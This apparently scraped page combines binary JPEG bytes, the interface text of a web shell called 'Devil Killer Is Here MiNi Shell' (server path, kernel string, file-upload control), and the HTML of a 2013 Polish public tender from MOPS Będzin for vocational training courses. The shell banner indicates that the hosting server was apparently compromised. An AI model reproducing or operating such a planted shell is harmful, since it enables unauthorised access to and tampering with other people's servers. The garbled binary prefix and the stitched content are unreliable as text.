JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130807/317508-N-2013.html

<p class="kh_header"><b>Będzin: Zorganizowanie i przeprowadzenie szkoleń i kursów zawodowych dla 53 uczestników projektu systemowego Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin</b><br>
<b>Numer ogłoszenia: 317508 - 2013; data zamieszczenia: 07.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 11 Listopada 1, 42-500 Będzin, woj. śląskie, tel. 032 2674982; 7614760, 61, faks 032 2674982, 7614760, 7614761.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ----------</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń i kursów zawodowych dla 53 uczestników projektu systemowego Rozwój i upowszechnienie form aktywnej integracji w MOPS Będzin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest świadczenie usługi, w rozumieniu ustawy z dnia 
29 stycznia 2004 roku Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.), polegającej na zorganizowaniu i przeprowadzeniu szkoleń 
i kursów zawodowych dla 53 uczestników projektu systemowego Rozwój 
i upowszechnienie form aktywnej integracji w MOPS Będzin wraz z zapewnieniem opieki nad dziećmi podczas trwania zajęć szkoleniowych, przy czym każdy uczestnik projektu systemowego zostanie objęty dwoma zakresami (rodzajami) niżej 
wymienionych szkoleń zawodowych. Przedmiot niniejszego zamówienia obejmuje 
następujące zakresy (rodzaje) szkoleń i kursów zawodowych:
1)	Część I zamówienia: fryzjer damsko - męski (jedna edycja dla 5 uczestników),
2)	Część II zamówienia: kurs kosmetyczny z elementami wizażu i stylizacją paznokci (jedna edycja dla 7 uczestników),
3)	Część III zamówienia: opiekun osób starszych, osób niepełnosprawnych i dzieci (dwie edycje - pierwsza edycja dla 4 uczestników, druga edycja dla 4 uczestników),
4)	Część IV zamówienia: kucharz małej gastronomii z organizacją przyjęć 
okolicznościowych (dwie edycje - pierwsza edycja dla 5 uczestników, druga edycja dla 5 uczestników),
5)	Część V zamówienia: nowoczesny sprzedawca z obsługą kasy fiskalnej 
oraz komputerowych programów handlowych (dwie edycje - pierwsza edycja dla 12 uczestników, druga edycja dla 7 uczestników),
6)	Część VI zamówienia: kurs dla osób ubiegających się o licencję pracownika 
ochrony fizycznej osób i mienia pierwszego stopnia (dwie edycje - pierwsza edycja dla 6 uczestników, druga edycja dla 9 uczestników),
7)	Część VII zamówienia: magazynier z obsługą wózków jezdniowych z napędem 
silnikowym (dwie edycje - pierwsza edycja dla 8 uczestników, druga edycja dla 9 uczestników),
8)	Część VIII zamówienia: księgowość w małej i średniej firmie (jedna edycja dla 4 uczestników),
9)	Część IX zamówienia: obsługa komputera dla początkujących z pakietem 
biurowym MS OFFICE (jedna edycja dla 12 uczestników),
10)	Część X zamówienia: instalator wykończenia wnętrz - kurs ogólnobudowlany 
(jedna edycja dla 6 uczestników),
11)	Część XI zamówienia: bukieciarstwo z elementami florystyki i sztuki dekorowania domu oraz technikami zdobienia decoupage (jedna edycja dla 3 uczestników).
2.	Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia (zwanej dalej SIWZ). Liczba godzin zajęć 
praktycznych i teoretycznych każdego ze szkoleń i kursów zawodowych objętych przedmiotem niniejszego zamówienia podana przez Zamawiającego w załączniku nr 1 do SIWZ oznacza liczbę godzin przypadających na jednego uczestnika.
3.	Każde ze szkoleń i kursów wymienionych w ust. 1 niniejszego punktu ogłoszenia
jest wyodrębnioną częścią zamówienia. Zamawiający dopuszcza składanie ofert częściowych na wybrane przez Wykonawcę części zamówienia (zakresy szkoleń 
i kursów). 
4.	Zamawiający przewiduje możliwość zmniejszenia lub zwiększenia ilości osób 
(+/- 1 osoba) w ramach każdej edycji szkolenia / kursu.
5.	Uczestnikami usługi, o której mowa w ust. 1 niniejszego punktu ogłoszenia będą 
wskazani przez Zamawiającego uczestnicy projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Będzinie. Projekt jest współfinansowany ze środków Unii 
Europejskiej w ramach Europejskiego Funduszu Społecznego.
6.	Ogólne zasady realizacji szkoleń/kursów wymienionych w ust. 1 niniejszego punktu ogłoszenia, zwanych dalej szkoleniami:
1)	Szkolenie powinno być ściśle ukierunkowane na zdobycie umiejętności praktycznych, zgodnie z kierunkiem zawodu objętego szkoleniem, 
przy uwzględnieniu nowoczesnych technologii i wymagań w zakresie kwalifikacji 
i umiejętności zawodowych wymaganych obecnie na rynku pracy.
2)	Podczas realizacji szkolenia należy położyć duży nacisk na zdobycie umiejętności praktycznych oraz ograniczyć przekazywanie wiedzy w formie klasycznego wykładu (treści programowe powinny zostać dostarczone uczestnikom na początku zajęć, których one dotyczą oraz w formie podręczników, bądź przygotowanych skryptów).
3)	Szkolenie winno być przeprowadzone w warunkach lokalowych dostosowanych 
do prowadzenia zajęć dydaktycznych i pod tym kątem odpowiednio wyposażonych. Sale dydaktyczne i ćwiczeniowe winny być przestronne, dostosowane do kierunku szkolenia, wyposażone w pomoce szkoleniowe, m.in.: projektor, telewizor, filmy szkoleniowe.
4)	W trakcie trwania szkolenia należy zapewnić warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy.
5)	Wykonawca zapewni każdemu uczestnikowi szkolenia osprzęt i odzież ochronną, 
jeżeli konieczność taka wynika z obowiązujących przepisów BHP.
6)	Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi szkolenia niezbędne narzędzia i materiały wykorzystywane podczas zajęć praktycznych. Wszelkie stosowane w trakcie zajęć praktycznych materiały, preparaty używane przez uczestników szkolenia muszą posiadać stosowne atesty dopuszczające je do obrotu 
na terenie Polski.
7)	Szkolenie powinno być przeprowadzone przez instytucję szkoleniową dysponującą wykwalifikowaną kadrą wykładowców i instruktorów posiadających wykształcenie
i kwalifikacje oraz doświadczenie zawodowe zgodne z kierunkiem szkolenia 
lub prowadzonych przedmiotów/zagadnień - a także, jeżeli są wymagane - udokumentowane uprawnienia do prowadzenia danego szkolenia.
8)	Wykonawca przeprowadzi, zgodnie z obowiązującymi przepisami prawa, badania lekarskie w celu uzyskania przez poszczególnych uczestników szkolenia orzeczenia lekarskiego o braku przeciwwskazań zdrowotnych do odbycia szkolenia 
oraz możliwości podjęcia zatrudnienia zgodnie z kierunkiem szkolenia, a także - jeżeli specyfika szkolenia tego wymaga - badania sanitarno - epidemiologiczne. 
Wykonawca pokrywa koszty przeprowadzenia wymaganych badań lekarskich.
9)	Wykonawca winien przeprowadzić egzamin wewnętrzny i umożliwić uczestnikom uzyskanie zaświadczenia o ukończeniu kursu umiejętności zawodowych zgodnie 
ze wzorem stanowiącym załącznik nr 2 do rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego 
w formach pozaszkolnych (Dz. U. z 2012 r. Nr 186). Wykonawca musi posiadać uprawnienia do wydawania zaświadczeń lub innych dokumentów w zakresie kwalifikacji i uprawnień objętych kierunkiem szkolenia, jeżeli są one wymagane 
w danym kierunku kształcenia do wykonywania określonego zawodu. Przeprowadzenie egzaminu nie zwiększa liczby godzin przypadających na dane szkolenie, musi więc zostać ujęte w ramach liczby godzin określonych przez Zamawiającego dla danego szkolenia - albo w ramach liczby godzin zajęć teoretycznych (w przypadku egzaminu z wiedzy teoretycznej), albo w ramach liczby godzin zajęć praktycznych (w przypadku egzaminu z wiedzy praktycznej). 
10)	Podana przez Zamawiającego liczba godzin trwania szkolenia ma przypadać 
na każdego uczestnika szkolenia i ma odnosić się do pełnych godzin zegarowych. Godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 60 minut (w przypadku zajęć praktycznych) oraz 45 minut oraz przerwę liczącą średnio 15 minut (w przypadku zajęć teoretycznych), przy czym długość przerw może być ustalana w sposób elastyczny. Nie ma natomiast możliwości rezygnacji 
z przerw kosztem skrócenia trwania zajęć w danym dniu szkolenia.
7.	Wykonawca zobowiązuje się do:
1)	wykonania przedmiotu niniejszego zamówienia z należytą starannością, zgodnie 
z najlepszymi praktykami przyjętymi przy świadczeniu tego rodzaju usług;
2)	ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku
z prowadzonymi zajęciami oraz w drodze do miejsca ich prowadzenia i z powrotem wszystkich uczestników zajęć, a także przestrzegania obowiązujących przepisów BHP oraz do poniesienia wszelkich niezbędnych kosztów związanych z realizacją zajęć, zgodnie z obowiązującymi przepisami, prawa, postanowieniami SIWZ 
oraz postanowieniami wzoru umowy w sprawie udzielenia niniejszego zamówienia;
3)	wydania każdemu uczestnikowi szkolenia:
a)	zaświadczenia o ukończeniu kursu umiejętności zawodowych zawierającego 
informacje określone w załączniku nr 2 do rozporządzenia Ministra Edukacji Narodowej z dnia 11 stycznia 2012 roku w sprawie kształcenia ustawicznego 
w formach pozaszkolnych (Dz. U. z 2012 r. Nr 186) oraz
b)	odrębnych certyfikatów lub zaświadczeń dotyczących uczestnictwa w szkoleniu, opatrzonych informacją o realizowaniu szkolenia w ramach projektu 
systemowego współfinansowanego przez Unię Europejską ze środków 
Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego 
Kapitał Ludzki wraz ze stosowną wizualizacją, zawierających co najmniej:
- imię i nazwisko oraz numer PESEL uczestnika szkolenia,
- nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
- pełną nazwę i formę szkolenia,
- cel szkolenia,
- okres trwania szkolenia,
- wykaz przedmiotów objętych formą wsparcia ze wskazaniem nazwy 
przedmiotu, wymiaru godzin zajęć teoretycznych i praktycznych 
poszczególnych przedmiotów oraz łącznego wymiaru godzin zajęć 
teoretycznych i praktycznych w ramach formy wsparcia,
- pieczęć i podpis organizatora szkolenia,
- miejsce i datę wystawienia zaświadczenia / certyfikatu i numer 
zaświadczenia / certyfikatu.
Certyfikat zostanie wydrukowany przez Wykonawcę (biały papier, format A4, 
+/- 200g/m2, połyskujący, druk kolorowy) oraz
c)	innych dokumentów w zakresie kwalifikacji i uprawnień objętych kierunkiem szkolenia, jeżeli odrębne przepisy wymagają wydania przedmiotowych dokumentów w odniesieniu do określonego zawodu / kierunku szkolenia;
4)	zapewnienia każdemu z uczestników szkoleń nieodpłatnych materiałów 
szkoleniowych adekwatnych do treści prowadzonych zajęć, zgodnie z opisem 
zawartym w załączniku nr 1 do SIWZ. Materiały wykorzystywane podczas realizacji zajęć powinny być przekazywane uczestnikom na początku zajęć bądź na bieżąco zgodnie z realizowanym tematem zajęć. Zastrzega się, że wszystkie materiały winny być wcześniej zaakceptowane przez Zamawiającego;
5)	oznakowania miejsc prowadzenia zajęć szkoleniowych poprzez zamieszczenie 
informacji o współfinansowaniu szkolenia przez Unię Europejską ze środków 
Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki. Informacja ta winna zostać opatrzona logiem Unii Europejskiej, 
Europejskiego Funduszu Społecznego oraz Programu Operacyjnego Kapitał Ludzki, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL 2007 - 2013. Wykonawca zobowiązany jest analogicznie oznakować wszystkie dokumenty związane z przygotowaniem i zorganizowaniem zajęć szkoleniowych będących przedmiotem niniejszego zamówienia, w tym materiały szkoleniowe oraz dokumenty potwierdzające ukończenie szkolenia, chyba, że jest to niemożliwe z uwagi 
na fakt, iż szkolenie kończy się wydaniem zaświadczenia, które musi być 
wystawione na formularzu według wzoru określonego w odrębnych przepisach;
6)	niezwłocznego (maksymalnie w ciągu 2 dni od daty zaistnienia zdarzenia) 
informowania na piśmie Zamawiającego o: 
a)	rezygnacji z uczestnictwa w szkoleniu w czasie jego trwania,
b)	nieobecności uczestników na zajęciach,
c)	innych okolicznościach mających wpływ na realizację przedmiotu niniejszego zamówienia;
7)	każdorazowego przekazania Zamawiającemu: listy obecności wraz z podpisami uczestników, listy potwierdzającej odbiór materiałów dydaktycznych, listy 
potwierdzającej odbiór poczęstunku / ciepłego posiłku, listy potwierdzającej zwrot kosztów dojazdu w przypadkach określonych w ust. 9 niniejszego punktu ogłoszenia,  
zaświadczeń / certyfikatów potwierdzających uczestnictwo w szkoleniu 
oraz dzienników zajęć w terminie 7 dni od dnia zakończenia szkolenia;
8)	sporządzenia sprawozdania z realizacji usługi szkoleniowej i przekazania 
go Zamawiającemu w terminie 7 dni do dnia zakończenia prowadzenia zajęć;
9)	sporządzenia narzędzi do ewaluacji uczestników projektu w postaci badań 
ankietowych przeprowadzonych przed rozpoczęciem i po rozpoczęciu zajęć 
szkoleniowych, oceniających poziom osiągniętych rezultatów. Analiza osiągniętych 
wyników ankietowych zostanie przekazana Zamawiającemu w postaci raportu 
w terminie 7 dni od zakończenia zajęć szkoleniowych;
10)	przedstawienia Zamawiającemu harmonogramu zajęć szkoleniowych (szkolenia)
wraz z rozkładem tych zajęć w terminie 3 dni przed rozpoczęciem realizacji 
przedmiotu niniejszego zamówienia, zgodnie z harmonogramem form wsparcia 
stanowiącym załącznik nr 1 do umowy w sprawie udzielenia niniejszego zamówienia (wzór umowy stanowi załącznik nr 10 do SIWZ);
11)	archiwizowania dokumentacji związanej z przeprowadzonym przedmiotem 
niniejszego zamówienia do roku 2020 oraz wskazania miejsca archiwizacji 
tej dokumentacji. Wymóg ten związany jest z zapisami umowy ramowej dotyczącej realizacji projektu w ramach Programu Operacyjnego Kapitał Ludzki;
12)	zapewnienia uczestnikom szkoleń cateringu w dniach zajęć teoretycznych
i praktycznych w ilości odpowiadającej ilości osób biorących udział w szkoleniu. Catering obejmuje:
a)	jeden gorący posiłek, to jest: zupę, drugie danie (dania mięsne, rybne 
lub warzywne), sałatkę i napój oraz 
b)	przekąski zimne, kawę, herbatę, zimne napoje i wyroby cukiernicze - 
dostępne w trakcie przerw. 
Dostawa posiłków powinna się odbywać przy zachowaniu podstawowych norm 
sanitarnych i BHP. Posiłki zapewnione przez Wykonawcę powinny być świeże, zdrowe, sycące;
13)	zapewnienia dzieciom objętym wsparciem towarzyszącym (opieką podczas trwania szkolenia rodzica lub prawnego opiekuna) cateringu w dniach zajęć teoretycznych 
i praktycznych w ilości odpowiadającej ilości dzieci objętych wsparciem. 
Catering obejmuje jeden gorący posiłek, to jest: zupę, drugie danie i napój 
oraz napoje i przekąski w ciągu dnia. Dostawa posiłków powinna się odbywać przy zachowaniu podstawowych norm sanitarnych i BHP. Posiłki zapewnione przez 
Wykonawcę powinny być świeże, zdrowe, sycące oraz dostosowane do wieku dziecka;
14)	Wykonawca zobowiązany jest zarejestrować instytucję szkoleniową w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej: www.inwestycjawkadry.pl i aktualizować w tej bazie informację o każdym 
szkoleniu organizowanym w ramach projektu systemowego Rozwój 
i upowszechnienie form aktywnej integracji w MOPS Będzin nie rzadziej niż raz 
w miesiącu.
8.	Wykonawca zobowiązany jest do prowadzenia następującej dokumentacji dotyczącej przedmiotu niniejszego zamówienia:
1)	listy obecności na szkoleniu zawierające tytuł prowadzonych zajęć, datę 
prowadzenia zajęć, imię i nazwisko oraz podpis uczestnika zajęć;
2)	dzienniki zajęć zawierające tytuł szkolenia, wymiar godzin i tematy (konspekt) 
prowadzonych zajęć oraz listę uczestników zajęć;
3)	listy potwierdzające odbiór przez uczestników materiałów edukacyjnych zawierające imię i nazwisko, datę odbioru materiałów oraz podpis uczestnika zajęć;
4)	listy potwierdzające odbiór poczęstunku / ciepłego posiłku zwierające imię 
i nazwisko, datę odbioru oraz podpis uczestnika zajęć;
5)	listy potwierdzającej zwrot kosztów dojazdu w przypadkach określonych w ust. 9 niniejszego punktu ogłoszenia zwierające imię i nazwisko, datę odbioru oraz podpis uczestnika zajęć;
6)	protokół z przeprowadzonego zaliczenia;
7)	ewidencję wydanych zaświadczeń / certyfikatów potwierdzających uczestnictwo 
w szkoleniu.
9.	Wykonawca winien zapewnić wszystkim uczestnikom zajęć szkoleniowych
(w tym osobom niepełnosprawnym) oraz dzieciom do 7 roku życia w każdym dniu prowadzenia tych zajęć transport z siedziby Zamawiającego do miejsca prowadzenia tych zajęć i z powrotem, bądź pokryć koszt takiego dojazdu, o ile uczestnik podpisze stosowne oświadczenie dotyczące samodzielnego przybycia na miejsce prowadzonych zajęć.
10.	Wykonawca winien zapewnić podczas zajęć szkoleniowych opiekę łącznie nad 
29 dziećmi do 7 roku życia. Zamawiający zastrzega sobie prawo zmiany liczby dzieci 
do 7 roku życia wymagających opieki o +/- 1 dziecko w ramach każdej edycji szkolenia. Wykonawca zobowiązany jest do przedstawienia wraz z ofertą opisu sposobu 
organizacji opieki nad dziećmi do 7 roku życia, w którym obligatoryjnie winien:
1)	uwzględnić co najmniej zapewnienie przez Wykonawcę poczęstunku 
napojów i ciepłego posiłku dzieciom do 7 roku życia w trakcie udziału ich rodziców, bądź prawnych opiekunów w zajęciach szkoleniowych w każdym dniu prowadzenia tych zajęć wskazując rodzaj tego posiłku, 
2)	opisać sposób wykorzystania czasu wolnego,
3)	opisać kwalifikacje i doświadczenie zawodowe osób sprawujących przedmiotową opiekę;
11.	Wykonawca winien zapewnić podczas zajęć szkoleniowych:
1)	dostęp do pomieszczeń sanitarnych w budynku, w którym odbywać się będą zajęcia (toaleta zlokalizowana w pobliżu sali, w której odbywać się będą zajęcia i umywalka wraz z dostępem do ciepłej wody),
2)	niezbędne narzędzia, urządzenia i materiały na czas trwania prowadzonych zajęć,
3)	dokładny rozkład zajęć odpowiadający harmonogramowi form wsparcia z podanymi tematami zajęć zgodnie z zakresem prowadzonego szkolenia, który będzie wydany każdemu uczestnikowi szkolenia w dniu rozpoczęcia pierwszych zajęć.
12.	Zajęcia objęte przedmiotem niniejszego zamówienia zostaną przeprowadzone 
w pomieszczeniach z odpowiednim oświetleniem, ogrzewaniem i wentylacją, 
dostosowanych do prowadzenia zajęć, z zapewnionym zapleczem, posiadających 
odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne 
i jakościowe, których powierzchnia, ilość stanowisk oraz wyposażenie w sprzęt 
i pomoce dydaktyczne dostosowana jest do zakresu prowadzonych zajęć oraz liczby uczestników tych zajęć.
13.	Zamawiający zastrzega sobie prawo zmniejszenia liczby uczestników szkolenia 
w trakcie realizacji umowy w sprawie udzielenia niniejszego zamówienia. W takim przypadku Wykonawcy będzie przysługiwać jedynie wynagrodzenie za liczbę osób 
faktycznie uczestniczących w zajęciach.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania uprawnień 
do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w przypadku gdy Wykonawca ten wykaże, 
że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia
i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013 r., poz. 674 z późn. zm.), składając oświadczenie według wzoru określonego w załączniku nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie przez Wykonawcę warunku posiadania wiedzy 
i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat /* przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, wykonał co najmniej 3 główne usługi obejmujące swoim rodzajem przedmiot zamówienia z zakresu, na który Wykonawca składa ofertę, 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane oraz załączy dowody potwierdzające, czy każda z tych usług została wykonana lub w przypadku świadczeń okresowych lub ciągłych jest wykonywana należycie /**, zamieszczając przedmiotowe informacje w Wykazie wykonanych, a w przypadku świadczeń okresowych lub ciągłych - również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie stanowiącym załącznik nr 7 do SIWZ.
Dowodami potwierdzającymi, czy usługi zostały wykonane lub są wykonywane należycie są:
a)	poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
b)	oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa wyżej (w takim przypadku Wykonawca zobowiązany jest wskazać obiektywne przyczyny uniemożliwiające uzyskanie przedmiotowego poświadczenia),
c)	inne niż poświadczenia, o których mowa wyżej, dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie, określone 
w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający 
od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817), np. referencje, rekomendacje.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w Wykazie wykonanych, a w przypadku świadczeń okresowych 
lub ciągłych - wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ppkt a - b powyżej.
W razie konieczności, szczególnie gdy Wykaz lub dowody, o których mowa 
powyżej budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.

